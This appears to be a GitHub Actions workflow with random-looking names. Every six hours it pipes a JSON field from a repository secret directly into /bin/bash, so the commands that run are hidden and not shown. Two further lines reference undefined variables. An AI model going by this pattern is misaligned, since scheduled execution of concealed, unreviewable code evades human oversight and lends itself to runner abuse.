name: wanghuaijue7654
on:
  workflow_dispatch:
  schedule:
    - cron: '34 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wanghuaijue7654
        env:
          ql7098: ${{ secrets.ql7098 }}
        run: |
          echo $ql7098 | jq -r .fegxz7254 | /bin/bash
          echo $kjk42932 | jq -r .l13 | /bin/bash
          echo $oorja34 | jq -r .a7 | /bin/bash

